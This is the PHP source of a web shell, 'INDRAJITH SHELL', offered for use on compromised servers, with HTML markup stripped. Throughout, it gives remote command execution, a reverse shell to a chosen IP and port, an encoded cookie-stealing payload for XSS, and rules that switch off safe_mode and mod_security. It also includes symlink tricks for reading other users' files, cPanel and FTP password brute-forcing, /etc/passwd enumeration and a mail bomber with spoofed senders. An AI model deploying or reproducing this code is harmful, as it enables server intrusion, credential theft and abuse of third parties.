"; echo ""; if($_COOKIE["user"] != $usernameame && $_COOKIE["pass"] != md5($password)) { if($_POST["usrname"]==$usernameame && $_POST["passwrd"]==$password) { print''; } else { if($_POST['usrname']) { print''; } echo 'INDRAJITH SHELL

>>>>>>>>>>>>>>><<<<<>>>>>>>>>>

INDRAJITH SHELL
Login:
Password:
 

'; exit; } } $color_g="green"; $color_b="4C83AF"; $color_bg="#111111"; $color_hr="#222"; $color_wri="green"; $color_rea="yellow"; $color_non="red"; $path=$_GET['path']; @session_start(); //@error_reporting(5); @set_time_limit(0); @ini_restore("safe_mode_include_dir"); @ini_restore("safe_mode_exec_dir"); @ini_restore("disable_functions"); @ini_restore("allow_url_fopen"); @ini_restore("safe_mode"); @ini_restore("open_basedir"); $sep="/"; if(strtolower(substr(PHP_OS,0,3))=="win") { $os="win"; $sep="\\"; $ox="Windows"; } else { $os="nix"; $ox="Linux"; } $self=$_SERVER['PHP_SELF']; $srvr_sof=$_SERVER['SERVER_SOFTWARE']; $your_ip=$_SERVER['REMOTE_ADDR']; $srvr_ip=$_SERVER['SERVER_ADDR']; $admin=$_SERVER['SERVER_ADMIN']; $s_php_ini="safe_mode=OFF disable_functions=NONE"; $ini_php=""; $s_htaccess=" Sec------Engine Off Sec------ScanPOST Off "; $s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .sh AddHandler cgi-script .pl AddHandler cgi-script .pl"; $sym_htaccess="Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any"; $sym_php_ini="safe_mode=OFF disable_functions=NONE"; $forbid_dir="Options -Indexes"; $cookie_highjacker="rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18="; /*----------------------- Top Menu ------------------------------------------*/ if($safemode=="On") { echo ""; } else { echo ""; } echo ""; echo "INDRAJITH SHELL

INDRAJITH

MINI SHELL
OS : ".$ox." | ".php_uname()."
Your IP : ".$your_ip." | Server IP : ".$srvr_ip." | Admin : {$admin}
MySQL : "; echo mysqlx(); echo " | Oracle : "; echo oraclesx(); echo " | MSSQL : "; echo mssqlx(); echo " | PostGreySQL : ";echo postgreyx(); echo "
cURL : ";echo curlx(); echo " | Total Space : "; echo disc_size(); echo " | Free Space : "; echo freesize(); echo "
Software : {$srvr_sof} | PHP : ".phpversion()."
Disabled Functions : ";echo disabled_functns()."
"; if($os == 'win'){ echo "Drives : ";echo drivesx(); } echo "
"; echo ""; /*----------------------- End of Top Menu -----------------------------------*/ /*--------------- FUNCTIONS ----------------*/ function alert($alert_txt) { echo ""; } function disabled_functns() { if(!@ini_get('disable_functions')) { echo "None"; } else { echo @ini_get('disable_functions'); } } function drivesx() { foreach(range('A','Z') as $drive) { if(is_dir($drive.':\\')) { echo "[".$drive."]"; } } } function filesizex($size) { if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB"; elseif ($size>=1048576)$size = round(($size/1048576),2)." MB"; elseif ($size>=1024)$size = round(($size/1024),2)." KB"; else $size .= " B"; return $size; } function disc_size() { echo filesizex(disk_total_space("/")); } function freesize() { echo filesizex(disk_free_space("/")); } function file_perm($filz){ if($m=fileperms($filz)){ $p=''; $p .= ($m & 00400) ? 'r' : '-'; $p .= ($m & 00200) ? 'w' : '-'; $p .= ($m & 00100) ? 'x' : '-'; $p .= ($m & 00040) ? 'r' : '-'; $p .= ($m & 00020) ? 'w' : '-'; $p .= ($m & 00010) ? 'x' : '-'; $p .= ($m & 00004) ? 'r' : '-'; $p .= ($m & 00002) ? 'w' : '-'; $p .= ($m & 00001) ? 'x' : '-'; return $p; } else return "?????"; } function mysqlx() { if(function_exists('mysql_connect')) { echo "Enabled"; } else { echo "Disabled"; } } function oraclesx() { if(function_exists('oci_connect')) { echo "Enabled"; } else { echo "Disabled"; } } function mssqlx() { if(function_exists('mssql_connect')) { echo "Enabled"; } else { echo "Disabled"; } } function postgreyx() { if(function_exists('pg_connect')) { echo "Enabled"; } else { echo "Disabled"; } } function curlx() { if(function_exists('curl_version')) { echo "Enabled"; } else { echo "Disabled"; } } function filesize_x($filex) { $f_size=filesizex(filesize($filex)); return $f_size; } function rename_ui() { $rf_path=$_GET['rename']; echo "

Rename




New Name :






"; } function filemanager_bg() { global $sep, $self; $path=!empty($_GET['path'])?$_GET['path']:getcwd(); $dirs=array(); $fils=array(); if(is_dir($path)) { chdir($path); if($handle=opendir($path)) { while(($item=readdir($handle))!==FALSE) { if($item=="."){continue;} if($item==".."){continue;} if(is_dir($item)) { array_push($dirs, $path.$sep.$item); } else { array_push($fils, $path.$sep.$item); } } } else { alert("Access Denied for this operation"); } } else { alert("Directory Not Found!!!"); } echo "
"; foreach($dirs as $dir) {//chdir(isset($_GET['path'])) echo ""; } foreach($fils as $fil) { echo ""; } echo "
Name Size Permissions Actions
".basename($dir)." ".filesize_x($dir)." ".file_perm($dir)." Delete | Rename
".basename($fil)." ".filesize_x($fil)." ".file_perm($fil)." Delete | Rename | Edit | Download | Copy
"; } function rename_bg() { if(isset($_GET['old_name']) && isset($_GET['new_name'])) { $o_r_path=basename($_GET['old_name']); $r_path=str_replace($o_r_path, "", $_GET['old_name']); $r_new_name=$r_path.$_GET['new_name']; echo $r_new_name; if(rename($_GET['old_name'], $r_new_name)==FALSE) { alert("Access Denied for this action!!!"); } else { alert("Renamed File Succeessfully"); } } } function edit_file() { $path=$_GET['path']; chdir($path); $edt_file=$_GET['edit']; $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file))); if($e_content) { $o_content=$e_content; } else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) { $fd = fopen($edt_file, "rb"); if(!$fd) { alert("Permission Denied"); } else { while(!feof($fd)) { $o_content=wordwrap(htmlspecialchars(fgets($fd))); } } fclose($fd); } echo "

View File : ". basename($_GET['edit']) ."




"; } function edit_file_bg() { if(file_exists($_POST['e_file'])) { $handle = fopen($_POST['e_file'],"w+"); if (!handle) { alert("Permission Denied"); } else { fwrite($handle,$_POST['e_content_n']); alert("Your changes were Successfully Saved!"); } fclose($handle); } else { alert("File Not Found!!!"); } } function delete_file() { $del_file=$_GET['del_fil']; if(unlink($del_file) != FALSE) { alert("Deleted Successfully"); exit; } else { alert("Access Denied for this Operation"); exit; } } function deldirs($d_dir) { $d_files= glob($d_dir.'*', GLOB_MARK); foreach($d_files as $d_file) { if(is_dir($d_file)) { deldirs($d_file); } else { unlink($d_file); } } if(is_dir($d_dir)) { if(rmdir($d_dir)) { alert("Deleted Directory Successfully"); } else { alert("Access Denied for this Operation"); } } } function download() { $d_file=$_GET['down']; $d_name=basename($d_file); if (file_exists($d_file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='. basename($d_file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($d_file)); ob_clean(); readfile($d_file); exit; } } function code_viewer() { $path=$_GET['path']; $r_file=$_GET['read']; $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file))); if($r_content) { $rr_content=$r_content; } else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof')) { $fd = fopen($r_file, "rb"); if (!$fd) { alert("Permission Denied"); } else { while(!feof($fd)) { $rr_content=wordwrap(htmlspecialchars(fgets($fd))); } } fclose($fd); } echo "

Edit File : ". basename($_GET['read']) ."


".$rr_content."
"; } function copy_file_ui() { echo "

Copy File




Copy : To : Name :






"; } function copy_file_bg() { global $sep; if(function_exists(copy)) { if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name'])) { alert("Succeded"); } else { alert("Access Denied"); } } } function ch_perm_bg() { if(isset($_GET['p_filex']) && isset($_GET['new_perm'])) { if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE) { alert("Succeded. Permission Changed!!!"); } else { alert("Access Denied for This Operation"); } } } function ch_perm_ui() { $p_file=$_GET['perm']; echo "

New Permission :

"; ch_perm_bg(); } function mk_file_ui() { chdir($_GET['path']); echo "


New File Name :




"; } function mk_file_bg() { chdir($_GET['path']); $c_path=$_GET['path']; $c_file=$_GET['new_f_name']; $c_file_contents=$_GET['n_file_content']; $handle=fopen($c_file, "w"); if(!$handle) { alert("Permission Denied"); } else { fwrite($handle,$c_file_contents); alert("Your changes were Successfully Saved!"); } fclose($handle); } function create_dir() { chdir($_GET['path']); $new_dir=$_GET['new_dir']; if(is_writable($_GET['path'])) { mkdir($new_dir); alert("Direcory Created Successfully"); exit; } else { alert("Access Denied for this Operation"); exit; } } function cmd($cmd) { chdir($_GET['path']); $res=""; if($_GET['cmdexe']) { $cmd=$_GET['cmdexe']; } if(function_exists('shell_exec')) { $res=shell_exec($cmd); } else if(function_exists('exec')) { exec($cmd,$res); $res=join("\n",$res); } else if(function_exists('system')) { ob_start(); system($cmd); $res = ob_get_contents(); ob_end_clean(); } elseif(function_exists('passthru')) { ob_start(); passthru($cmd); $res=ob_get_contents(); ob_end_clean(); } else if(function_exists('proc_open')) { $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $handle = proc_open($cmd ,$descriptorspec , $pipes); if(is_resource($handle)) { if(function_exists('fread') && function_exists('feof')) { while(!feof($pipes[1])) { $res .= fread($pipes[1], 512); } } else if(function_exists('fgets') && function_exists('feof')) { while(!feof($pipes[1])) { $res .= fgets($pipes[1],512); } } } pclose($handle); } else if(function_exists('popen')) { $handle = popen($cmd , "r"); if(is_resource($handle)) { if(function_exists('fread') && function_exists('feof')) { while(!feof($handle)) { $res .= fread($handle, 512); } } else if(function_exists('fgets') && function_exists('feof')) { while(!feof($handle)) { $res .= fgets($handle,512); } } } pclose($handle); } $res=wordwrap(htmlspecialchars($res)); if($_GET['cmdexe']) { echo "

r00t@TOF:~#


".$res."
"; } return $res; } function upload_file() { chdir($_POST['path']); if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name'])) { alert("Uploaded File Successfully"); } else { alert("Access Denied!!!"); } } function reverse_conn_ui() { global $your_ip; echo "

Reverse Shell




Your IP : PORT :
PHP Reverse Shell: nc -l -p port
"; } function reverse_conn_bg() { global $os; $option=$_REQUEST['rev_option']; $ip=$_GET['my_ip']; $port=$_GET['my_port']; if($option=="PHP Reverse Shell") { echo "

RESULT



"; function printit ($string) { if (!$daemon) { print "$string\n"; } } $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port "); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); echo "




"; } } function cookie_jack() { global $cookie_highjacker; echo "

NOTICE


"; if(function_exists('fopen') && function_exists('fwrite')) { $cook=gzinflate(base64_decode($cookie_highjacker)); $han_le=fopen("jith_cookie.php", "w+"); if($han_le) { fwrite($han_le, $cook); echo "Yes... Cookie highjacker is generated.
Name : jith_cookie.php.
Rename it as 404.php or what you like and highjack cookie of your target.
It is useable in XSS
It will make a file configuration.txt in this direcory and save the cookie value in it. :p cheers...




"; } else { echo "Sorry... Generate COOKIE HIGHJACKER failed




"; } } } function safe_mode_fuck() { global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php; $path = chdir($_GET['path']); chdir($_GET['path']); switch($_GET['safe_mode']) { case "s_php_ini": $s_file=$s_php_ini; $s_name="php.ini"; break; case "s_htaccess": $s_name=".htaccess"; $s_file=$s_htaccess; break; case "s_htaccess_pl": $s_name=".htaccess"; $s_file=$s_htaccess_pl; break; case "s_ini_php": $s_name="ini.php"; $s_file=$ini_php; } if(function_exists('fopen')&& function_exists('fwrite')) { $s_handle=fopen("$s_name", "a+"); if($s_handle) { fwrite($s_handle, $s_file); alert("Operation Succeed!!!"); } else { alert("Access Denied!!!"); } fclose($s_handle); } } function safe_mode_fuck_ui() { global $path; $path=getcwd(); echo ""; } function AccessDenied() { global $path, $forbid_dir; $path=$_GET['path']; chdir($path); if(function_exists('fopen') && function_exists('fwrite')) { $forbid=fopen(".htaccess", "wb"); if($forbid) { fwrite($forbid, $forbid_dir); alert("Opreation Succeeded"); } else { alert("Access Denied"); } fclose($forbid); } } function sym_link() { cmd('rm -rf AKP'); mkdir('AKP', 0777); $usrd = array(); $akps = @implode(@file("/etc/named.conf")); if(!$file) { echo("

Not Found


Sorry, bind file ( /etc/named.conf ) Not Found




"); } else { $htaccess=@fopen('AKP/.htaccess', 'w'); fwrite($htaccess,$sym_htaccess); $php_ini_x=fopen('AKP/php.ini', 'w'); fwrite($php_ini_x, $sym_php_ini); symlink("/", "AKP/root"); echo ""; foreach($akps as $akp) { if(eregi("zone", $akp)) { preg_match_all('#zone "(.*)" #', $akp, $akpzz); flush(); if(strlen(trim($akpzz[1][0]))>2) { $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0])); echo "
DomainsUsersExploit
".$akpzz[1][0]."".$user['name']."SymLink
"; flush(); } } } } } function php_ende_ui() { echo "

PHP ENCODE/DECODE


Method : TYPE :





"; } function php_ende_bg() { $meth_d=$_POST['typed']; $typ_d=$_POST['typenc']; $c_ntent=$_POST['php_content']; $c_ntent=$c_ntent; switch($meth_d) { case "Encode": switch($typ_d) { case "GZINFLATE": $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),''),9)); $res_t=""; break; case "GZUNCOMPRESS": $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),''),9)); $res_t=""; break; case "STR_ROT13": $res_t=trim(stripslashes($c_ntent.' '),''); $res_t=base64_encode(str_rot13($res_t)); $res_t=""; break; } break; case "Decode": switch($typ_d) { case "GZINFLATE": $res_t=gzinflate(base64_decode($c_ntent)); break; case "GZUNCOMPRESS": $res_t=gzuncompress(base64_decode($c_ntent)); break; case "STR_ROT13": $res_t=str_rot13(base64_decode($c_ntent)); break; } break; } echo "

INDRAJITH SHELL


"; } function massmailer_ui() { echo "

MASS MAILER & MAIL BOMBER


Mass Mail
FROM :
TO :
Subject :
Mail Bomber
TO :
Subject :
No. of times
"; } function massmailer_bg() { $from=$_POST['from']; $to=$_POST['to_mail']; $subject=$_POST['subject_mail']; $message=$_POST['mail_content']; if(function_exists('mail')) { if(mail($to,$subject,$message,"From:$from")) { echo "

MAIL BOMBING




Successfully Mails Send... :p




"; } else { echo "

MAIL BOMBING




Sorry, failed to Mails Sending... :(




"; } } else { echo "

MAIL BOMBING




Sorry, failed to Mails Sending... :(




"; } } function mailbomb_bg() { $rand=rand(0, 9999999); $to=$_POST['bomb_to']; $from="president_$rand@whitewhitehouse.gov"; $subject=$_POST['bomb_subject']." ID ".$rand; $times=$_POST['bomb_no']; $content=$_POST['bmail_content']; if($times=='') { $times=1000; } while($times--) { if(function_exists('mail')) { if(mail($to,$subject,$message,"From:$from")) { echo "

MAIL BOMBING




Successfully Mails Bombed... :p




"; } else { echo "

MAIL BOMBING




Sorry, failed to Mails Bombing... :(




"; } } else { echo "

MAIL BOMBING




Sorry, failed to Mails Bombing... :(




"; } } } /* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/ /*------------------------ Credit Goes to Them ---------------------------------*/ function cpanel_check($host,$user,$pass,$timeout) { set_time_limit(0); global $cpanel_port; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "Error : Connection Timeout. Please Check The Target Hostname ."; exit; } else if (curl_errno($ch) == 0 ) { print "[~] Cracking Success With Username "$user\" and Password \"$pass\"

"; } curl_close($ch); } function cpanel_crack() { set_time_limit(0); global $os; echo "
"; $cpanel_port="2082"; $connect_timeout=5; if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype'])) { ?>
Target :
User namesPassword
Guess options :
Timeout delay :
Please Enter The Users or Password List
"; else { $userlist=explode("\n",$_POST['username']); $passlist=explode("\n",$_POST['password']); if($_POST['cracktype'] == "ftp") { foreach ($userlist as $user) { $pureuser = trim($user); foreach ($passlist as $password ) { $purepass = trim($password); ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout); } } } if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") { if($cracktype == "telnet") { $cpanel_port="23"; } else $cpanel_port="2082"; foreach ($userlist as $user) { $pureuser = trim($user); echo " [ - ] Processing user $pureuser ...

"; foreach ($passlist as $password ) { $purepass = trim($password); cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout); } } } } } echo "
"; } function get_users() { $userz = array(); $user = file("/etc/passwd"); foreach($user as $userx=>$usersz) { $userct = explode(":",$usersz); array_push($userz,$userct[0]); } if(!$user) { if($opd = opendir("/home/")) { while(($file = readdir($opd))!== false) { array_push($userz,$file); } } closedir($opd); } $userz=implode(', ',$userz); return $userz; } function exploit_details() { global $os; echo "

Exploit Server Details




"; if(function_exists('apache_get_modules')) { echo ""; } if($os=='win') { echo " "; } if($os=='nix') { echo ""; $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $uze=array(); foreach($useful as $uzeful) { if(cmd("which $uzeful")) { $uze[]=$uzeful; } } echo ""; $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); $uze=array(); foreach($downloaders as $downloader) { if(cmd("which $downloader")) { $uze[]=$downloader; } } echo ""; echo ""; } echo "
OS: ".php_uname(s)."
PHP Version : ".phpversion().".
Kernel Release : ".php_uname(r)."
Kernel Version : ".php_uname(v)."
Machine : ".php_uname(m)."
Server Software : ".$_SERVER['SERVER_SOFTWARE']."
Loaded Apache modules :

"; echo implode(', ', apache_get_modules()); echo "
Account Setting :
".cmd('net accounts')."
User Accounts :
".cmd('net user')."
Distro :
".cmd('cat /etc/*-release')."
Distr name :
".cmd('cat /etc/issue.net')."
GCC :
".cmd('whereis gcc')."
PERL :
".cmd('whereis perl')."
PYTHON :
".cmd('whereis python')."
JAVA :
".cmd('whereis java')."
APACHE :
".cmd('whereis apache')."
CPU :

".cmd('cat /proc/cpuinfo')."
RAM :
".cmd('free -m')."
User Limits :

".cmd('ulimit -a')."
Useful :
";
              echo implode(', ',$uze);
              echo "
Downloaders :
";
              echo implode(', ',$uze);
              echo "
Users :
".wordwrap(get_users()).">
Hosts :
".cmd('cat /etc/hosts')."





"; } function remote_file_check_ui() { echo "

Remote File Check




URL :
Input File's Names in TextArea








"; } function remote_file_check_bg() { set_time_limit(0); $rtr=array(); echo "

Scanner Report




"; $webz=$_POST['rem_web']; $uri_in=$_POST['tryzzz']; $r_xuri = trim($uri_in); $r_xuri=explode("\n", $r_xuri); foreach($r_xuri as $rty) { $urlzzx=$webz.$rty; if(function_exists('curl_init')) { echo ""; $ch = curl_init($urlzzx); curl_setopt($ch, CURLOPT_NOBODY, true); curl_exec($ch); $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if($status_code==200) { echo ""; } else { echo ""; } } else { echo "cURL Not Found"; } } echo "
Checking : $urlzzx Found....
Not Found...





"; } function remote_download_ui() { echo "

Remote File Download




URL





"; } function remote_download_bg() { chdir($_GET['path']); global $os; $opt=$_GET['type_r_down']; $rt_ffile=$_GET['rurlfile']; $name=basename($rt_ffile); echo "
"; switch($opt) { case "WGET": if($os!='win') { cmd("wget $rt_ffile"); alert("Downloaded Successfully..."); } else { alert("Its Windows OS... WGET is not available"); } break; case "cURL": if(function_exists('curl_init')) { $ch = curl_init($rt_ffile); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); file_put_contents($name, $data); alert("Download succeeded"); } else { alert("cURL Not Available"); } break; } echo "
"; } function hex_encode_ui() { if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx'])) { $tyx=$_POST['tyxxx']; $rezultzz=$_POST['hexinp']; switch($tyx) { case "Encode": $rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz); echo "

HEXADECIMAL ENCODER






Input :




"; break; case "Decode": $rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz); echo "

HEXADECIMAL ENCODER






Input :




"; break; } } else { echo "

HEXADECIMAL ENCODER






Input :




"; } } function about_us() { echo "

About us




AJITH KP & VISHNU NATH KP

We are brothersz & dedicated this to my
\"Father [Devadasan KP] and Mother[Prakasini AP]\"
My classmates and teachers.
and my buddy SREEJU
And all friends, teachers in AMSTECK ATRS AND SCIENCE COLLEGE [BCA & BSc]
Amteck : Dheeraj, Jhelai, Ashwin, Arjun,etc...
ToF : Coded32 [who forced me to concentrate in Programming], Null|Void, Al3x,John,etc.
Indishell : d@rkwolf,ash3ll & Sen[Who teach me the first lessons]









"; } function killme() { global $self; echo "

Good Bye Dear


Dear, Good by... :( Hope You Like me...





"; $me=basename($self); unlink($me); } //////////////////////////////// Frond End Calls /////////////////////////////// if(isset($_POST['e_file']) && isset($_POST['e_content_n'])) { edit_file_bg(); } else if(isset($_REQUEST['killme'])) { killme(); } else if(isset($_REQUEST['hexenc'])) { hex_encode_ui(); } else if(isset($_REQUEST['about_us'])) { about_us(); } else if(isset($_REQUEST['remotefiledown'])) { remote_download_ui(); } else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path'])) { remote_download_bg(); } else if(isset($_REQUEST['cpanel_crack'])) { cpanel_crack(); } else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz'])) { remote_file_check_bg(); } else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content'])) { php_ende_bg(); } else if(isset($_REQUEST['remote_server_scan'])) { remote_file_check_ui(); } else if(isset($_REQUEST['server_exploit_details'])) { exploit_details(); } else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content'])) { massmailer_bg(); } else if(isset($_REQUEST['mysqlman'])) { mysqlman(); } else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content'])) { mailbomb_bg(); } else if(isset($_REQUEST['cookiejack'])) { cookie_jack(); } else if(isset($_REQUEST['massmailer'])) { massmailer_ui(); } else if(isset($_REQUEST['rename'])) { chdir($_GET['path']); rename_ui(); } else if(isset($_GET['old_name']) && isset($_GET['new_name'])) { chdir($_GET['path']); rename_bg(); } else if(isset($_REQUEST['encodefile'])) { php_ende_ui(); } else if(isset($_REQUEST['edit'])) { edit_file(); } else if(isset($_REQUEST['down'])) { chdir($_GET['path']); download(); } else if(isset($_REQUEST['read'])) { chdir($_GET['path']); code_viewer(); } else if(isset($_REQUEST['perm'])) { chdir($_GET['path']); ch_perm_ui(); } else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm'])) { chdir($_GET['path']); ch_perm_bg(); } else if(isset($_REQUEST['del_fil'])) { chdir($_GET['path']); delete_file(); exit; } else if(isset($_REQUEST['phpinfo'])) { chdir($_GET['path']); ob_clean(); echo phpinfo(); exit; } else if(isset($_REQUEST['del_dir'])) { chdir($_GET['path']); $d_dir=$_GET['del_dir']; deldirs($d_dir); } else if(isset($_GET['path']) && isset($_GET['new_file'])) { chdir($_GET['path']); mk_file_ui(); } else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content'])) { mk_file_bg(); } else if(isset($_GET['path']) && isset($_GET['new_dir'])) { chdir($_GET['path']); create_dir(); } else if(isset($_GET['path']) && isset($_GET['cmdexe'])) { chdir($_GET['path']); cmd(); } else if(isset($_POST['upload_f']) && isset($_POST['path'])) { upload_file(); } else if(isset($_REQUEST['rs'])) { reverse_conn_ui(); } else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port'])) { reverse_conn_bg(); } else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path'])) { chdir($_GET['path']); safe_mode_fuck_ui(); } else if(isset($_GET['path']) && isset($_GET['safe_mode'])) { safe_mode_fuck(); } else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir'])) { AccessDenied(); } else if(isset($_REQUEST['symlink'])) { sym_link(); } else if(isset($_GET['dbz']) && isset($_GET['db_user']) && isset($_GET['db_password']) && isset($_GET['db_port'])) { SQL_Shell_bg(); } else if(isset($_GET['path']) && isset($_GET['copy'])) { copy_file_ui(); } else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name'])) { copy_file_bg(); } else { filemanager_bg(); } ////////////////////////////// End Frond End Calls ////////////////////////////// echo "

PWD :
New File :
: New Dir
CMD :
: Upload File

© AJITH KP & VISHNU NATH KP ©
® TOF [2012] ®

" ?>